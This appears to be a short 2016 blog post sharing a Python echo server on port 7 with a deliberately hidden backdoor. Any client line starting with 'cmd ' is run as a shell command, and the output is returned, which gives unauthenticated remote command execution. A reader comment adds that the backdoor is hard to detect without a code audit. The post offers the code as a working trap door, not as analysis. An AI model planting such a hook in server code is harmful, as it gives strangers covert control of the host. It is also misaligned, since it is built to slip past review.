Thursday, September 29, 2016

An echo server with a trap door

#!/usr/bin/python
#Written in August, 2016 with wwiinngd's help
import sys, socket, subprocess, re

s = socket.socket()
host = socket.gethostname()
port = 7
s.bind((host, port))
s.listen(5)
while True:
    c, addr = s.accept()
    print('Client: ', addr)
    while True:
        c.send("request (type \"quit\" to quit): ")
        request = c.recv(1024)
        if (request == "quit\n"):
            c.close()
            del c
            break
        #Backdoor function starts
        match = re.search(r'^cmd (.*)', request, re.M|re.I)
        if match:
            request = "test\n"
            command = match.group(1)
            try:
                output = subprocess.check_output(command, shell=True)
                c.send(output)
            except:
                print "Subprocess is malfunctioning."
        #Backdoor function ends
        print request
        c.send("reply: " + request)
s.close()    
Posted by at

1 comment:

  1. Demonalex's BlogSeptember 29, 2016 at 7:28 PM

    It's not easy to be figured out unless implementing Code Audit.

    ReplyDelete

Subscribe to: Post Comments (Atom)